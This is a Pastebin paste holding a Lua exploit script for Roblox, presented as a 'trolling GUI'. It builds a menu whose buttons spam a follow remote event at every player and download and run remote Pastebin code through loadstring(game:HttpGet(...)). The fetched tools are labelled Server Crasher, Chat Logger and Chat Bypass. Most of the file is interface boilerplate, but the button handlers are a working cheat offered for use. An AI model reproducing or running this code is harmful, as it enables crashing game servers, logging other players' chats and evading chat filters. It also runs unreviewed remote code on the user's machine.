Advertisement
BlastingStone

alr

Jan 11th, 2020
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 10.15 KB | None | 0 0
  1. --[[
  2.     ____  __           __  _             _____ __                
  3.    / __ )/ /___ ______/ /_(_)___  ____ _/ ___// /_____  ____  ___
  4.   / __  / / __ `/ ___/ __/ / __ \/ __ `/\__ \/ __/ __ \/ __ \/ _ \
  5.  / /_/ / / /_/ (__  ) /_/ / / / / /_/ /___/ / /_/ /_/ / / / /  __/
  6. /_____/_/\__,_/____/\__/_/_/ /_/\__, //____/\__/\____/_/ /_/\___/
  7.                                /____/ Made by BlastingStone#8878
  8. ]]--
  9.  
  10. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Made by BlastingStone.\n My 1st trolling GUI. Made for testing my scripting skills.",Duration=20,Button1="Alright."})
  11.  
  12. local ScreenGui = Instance.new("ScreenGui")
  13. local Frame = Instance.new("Frame")
  14. local TextLabel = Instance.new("TextLabel")
  15. local ImageLabel = Instance.new("ImageLabel")
  16. local TextLabel_2 = Instance.new("TextLabel")
  17. local TextButton = Instance.new("TextButton")
  18. local TextButton_2 = Instance.new("TextButton")
  19. local TextLabel_3 = Instance.new("TextLabel")
  20. local TextButton_3 = Instance.new("TextButton")
  21. local TextButton_4 = Instance.new("TextButton")
  22. local TextButton_5 = Instance.new("TextButton")
  23. local TextButton_6 = Instance.new("TextButton")
  24.  
  25. --Properties:
  26.  
  27. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  28. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  29.  
  30. Frame.Active = true
  31. Frame.Draggable = true
  32. Frame.Parent = ScreenGui
  33. Frame.BackgroundColor3 = Color3.new(0.509804, 0.509804, 0.509804)
  34. Frame.BorderColor3 = Color3.new(0, 0, 0)
  35. Frame.BorderSizePixel = 3
  36. Frame.Position = UDim2.new(0.101851851, 0, 0.210826248, 0)
  37. Frame.Size = UDim2.new(0, 594, 0, 480)
  38.  
  39. TextLabel.Parent = Frame
  40. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  41. TextLabel.BackgroundTransparency = 1
  42. TextLabel.Position = UDim2.new(0.330586821, 0, 0.0466666669, 0)
  43. TextLabel.Size = UDim2.new(0, 200, 0, 50)
  44. TextLabel.Font = Enum.Font.Arcade
  45. TextLabel.Text = "some dumb trolling gui"
  46. TextLabel.TextColor3 = Color3.new(0, 0, 0)
  47. TextLabel.TextScaled = true
  48. TextLabel.TextSize = 14
  49. TextLabel.TextWrapped = true
  50.  
  51. ImageLabel.Parent = Frame
  52. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  53. ImageLabel.BackgroundTransparency = 1
  54. ImageLabel.Position = UDim2.new(0.818420827, 0, 0, 0)
  55. ImageLabel.Size = UDim2.new(0, 107, 0, 110)
  56. ImageLabel.Image = "http://www.roblox.com/asset/?id=4492172626"
  57.  
  58. TextLabel_2.Parent = Frame
  59. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  60. TextLabel_2.BackgroundTransparency = 1
  61. TextLabel_2.Position = UDim2.new(0.428042322, 0, 0.150833338, 0)
  62. TextLabel_2.Size = UDim2.new(0, 136, 0, 16)
  63. TextLabel_2.Font = Enum.Font.Code
  64. TextLabel_2.Text = "v0.44 / BlastingStone#8878"
  65. TextLabel_2.TextColor3 = Color3.new(0, 0, 0)
  66. TextLabel_2.TextSize = 14
  67.  
  68. TextButton.Parent = Frame
  69. TextButton.BackgroundColor3 = Color3.new(1, 1, 1)
  70. TextButton.BorderSizePixel = 3
  71. TextButton.Position = UDim2.new(0.098941803, 0, 0.252499998, 0)
  72. TextButton.Size = UDim2.new(0, 200, 0, 50)
  73. TextButton.Font = Enum.Font.Cartoon
  74. TextButton.Text = "Follow All"
  75. TextButton.TextColor3 = Color3.new(0, 0, 0)
  76. TextButton.TextSize = 14
  77.  
  78. TextButton_2.Parent = Frame
  79. TextButton_2.BackgroundColor3 = Color3.new(1, 1, 1)
  80. TextButton_2.BorderSizePixel = 3
  81. TextButton_2.Position = UDim2.new(0.098941803, 0, 0.425833315, 0)
  82. TextButton_2.Size = UDim2.new(0, 200, 0, 50)
  83. TextButton_2.Font = Enum.Font.Cartoon
  84. TextButton_2.Text = "Check it out yourself."
  85. TextButton_2.TextColor3 = Color3.new(0, 0, 0)
  86. TextButton_2.TextSize = 14
  87.  
  88. TextLabel_3.Parent = Frame
  89. TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
  90. TextLabel_3.BackgroundTransparency = 1
  91. TextLabel_3.Position = UDim2.new(0.330110669, 0, 0.895833313, 0)
  92. TextLabel_3.Size = UDim2.new(0, 200, 0, 50)
  93. TextLabel_3.Font = Enum.Font.Code
  94. TextLabel_3.Text = "I'm sorry for this script."
  95. TextLabel_3.TextColor3 = Color3.new(0, 0, 0)
  96. TextLabel_3.TextSize = 14
  97.  
  98. TextButton_3.Parent = Frame
  99. TextButton_3.BackgroundColor3 = Color3.new(1, 1, 1)
  100. TextButton_3.BorderSizePixel = 3
  101. TextButton_3.Position = UDim2.new(0.098941803, 0, 0.602916658, 0)
  102. TextButton_3.Size = UDim2.new(0, 200, 0, 50)
  103. TextButton_3.Font = Enum.Font.Cartoon
  104. TextButton_3.Text = "R6 Flying Orbs"
  105. TextButton_3.TextColor3 = Color3.new(0, 0, 0)
  106. TextButton_3.TextSize = 14
  107.  
  108. TextButton_4.Parent = Frame
  109. TextButton_4.BackgroundColor3 = Color3.new(1, 1, 1)
  110. TextButton_4.BorderSizePixel = 3
  111. TextButton_4.Position = UDim2.new(0.545928359, 0, 0.252499998, 0)
  112. TextButton_4.Size = UDim2.new(0, 200, 0, 50)
  113. TextButton_4.Font = Enum.Font.Cartoon
  114. TextButton_4.Text = "Chat Logger"
  115. TextButton_4.TextColor3 = Color3.new(0, 0, 0)
  116. TextButton_4.TextSize = 14
  117.  
  118. TextButton_5.Parent = Frame
  119. TextButton_5.BackgroundColor3 = Color3.new(1, 1, 1)
  120. TextButton_5.BorderSizePixel = 3
  121. TextButton_5.Position = UDim2.new(0.545069754, 0, 0.425833315, 0)
  122. TextButton_5.Size = UDim2.new(0, 200, 0, 50)
  123. TextButton_5.Font = Enum.Font.Cartoon
  124. TextButton_5.Text = "Server Crasher"
  125. TextButton_5.TextColor3 = Color3.new(0, 0, 0)
  126. TextButton_5.TextSize = 14
  127.  
  128. TextButton_6.Parent = Frame
  129. TextButton_6.BackgroundColor3 = Color3.new(1, 1, 1)
  130. TextButton_6.BorderSizePixel = 3
  131. TextButton_6.Position = UDim2.new(0.545069754, 0, 0.602916658, 0)
  132. TextButton_6.Size = UDim2.new(0, 200, 0, 50)
  133. TextButton_6.Font = Enum.Font.Cartoon
  134. TextButton_6.Text = "Chat Bypass"
  135. TextButton_6.TextColor3 = Color3.new(0, 0, 0)
  136. TextButton_6.TextSize = 14
  137.  
  138. -- Scripts:
  139.  
  140. local function JJTG_fake_script() -- TextLabel.LocalScript
  141.     local script = Instance.new('LocalScript', TextLabel)
  142.  
  143.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  144.    
  145.     counter = 0
  146.    
  147.     while wait(0.1)do
  148.      script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  149.      
  150.      counter = counter + 0.01
  151.     end
  152. end
  153. coroutine.wrap(JJTG_fake_script)()
  154. local function DBFCD_fake_script() -- TextButton.LocalScript
  155.     local script = Instance.new('LocalScript', TextButton)
  156.  
  157.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  158.    
  159.     counter = 0
  160.    
  161.     while wait(0.1)do
  162.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  163.      
  164.      counter = counter + 0.01
  165.     end
  166. end
  167. coroutine.wrap(DBFCD_fake_script)()
  168. TextButton.MouseButton1Click:connect(function() -- TextButton.LocalScript
  169.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  170.     local RobloxReplicatedStorage = game:GetService('RobloxReplicatedStorage')
  171.     local RemoteEvent_NewFollower = RobloxReplicatedStorage:WaitForChild('NewFollower')
  172.     while wait(0) do
  173.     for i,v in pairs(game.Players:GetChildren()) do
  174.     RemoteEvent_NewFollower:FireServer(v, true)
  175.     end
  176.     end
  177. end)
  178. local function BUPFG_fake_script() -- TextButton_2.LocalScript
  179.     local script = Instance.new('LocalScript', TextButton_2)
  180.  
  181.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  182.    
  183.     counter = 0
  184.    
  185.     while wait(0.1)do
  186.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  187.      
  188.      counter = counter + 0.01
  189.     end
  190. end
  191. coroutine.wrap(BUPFG_fake_script)()
  192. TextButton_2.MouseButton1Click:connect(function() -- TextButton_2.LocalScript
  193.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  194.     loadstring(game:HttpGet(('https://pastebin.com/raw/VBNjM0nh'),true))()
  195. end)
  196. local function PLSL_fake_script() -- Frame.LocalScript
  197.     local script = Instance.new('LocalScript', Frame)
  198.  
  199.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  200.    
  201.     counter = 0
  202.    
  203.     while wait(0.1)do
  204.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  205.      
  206.      counter = counter + 0.01
  207.     end
  208. end
  209. coroutine.wrap(PLSL_fake_script)()
  210. local function JJIAO_fake_script() -- TextButton_3.LocalScript
  211.     local script = Instance.new('LocalScript', TextButton_3)
  212.  
  213.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  214.    
  215.     counter = 0
  216.    
  217.     while wait(0.1)do
  218.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  219.      
  220.      counter = counter + 0.01
  221.     end
  222. end
  223. coroutine.wrap(JJIAO_fake_script)()
  224. TextButton_3.MouseButton1Click:connect(function() -- TextButton_3.LocalScript
  225.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  226.     loadstring(game:HttpGet(('https://pastebin.com/raw/UrxVQURH'),true))()
  227. end)
  228. local function DBBAEQ_fake_script() -- TextButton_4.LocalScript
  229.     local script = Instance.new('LocalScript', TextButton_4)
  230.  
  231.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  232.    
  233.     counter = 0
  234.    
  235.     while wait(0.1)do
  236.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  237.      
  238.      counter = counter + 0.01
  239.     end
  240. end
  241. coroutine.wrap(DBBAEQ_fake_script)()
  242. TextButton_4.MouseButton1Click:connect(function() -- TextButton_4.LocalScript
  243.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  244.     loadstring(game:HttpGet(('https://pastebin.com/raw/N9j7KTQz'),true))()
  245. end)
  246. local function EWOT_fake_script() -- TextButton_5.LocalScript
  247.     local script = Instance.new('LocalScript', TextButton_5)
  248.  
  249.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  250.    
  251.     counter = 0
  252.    
  253.     while wait(0.1)do
  254.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  255.      
  256.      counter = counter + 0.01
  257.     end
  258. end
  259. coroutine.wrap(EWOT_fake_script)()
  260. TextButton_5.MouseButton1Click:connect(function() -- TextButton_5.LocalScript
  261.     loadstring(game:HttpGet(('https://pastebin.com/raw/VSeqmt5t'),true))()
  262. end)
  263. local function YFTMIWG_fake_script() -- TextButton_6.LocalScript
  264.     local script = Instance.new('LocalScript', TextButton_6)
  265.  
  266.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  267.    
  268.     counter = 0
  269.    
  270.     while wait(0.1)do
  271.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  272.      
  273.      counter = counter + 0.01
  274.     end
  275. end
  276. coroutine.wrap(YFTMIWG_fake_script)()
  277. TextButton_6.MouseButton1Click:connect(function() -- TextButton_6.LocalScript
  278.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  279.     loadstring(game:HttpGet(('https://pastebin.com/raw/Wh0DUEdn'),true))()
  280. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement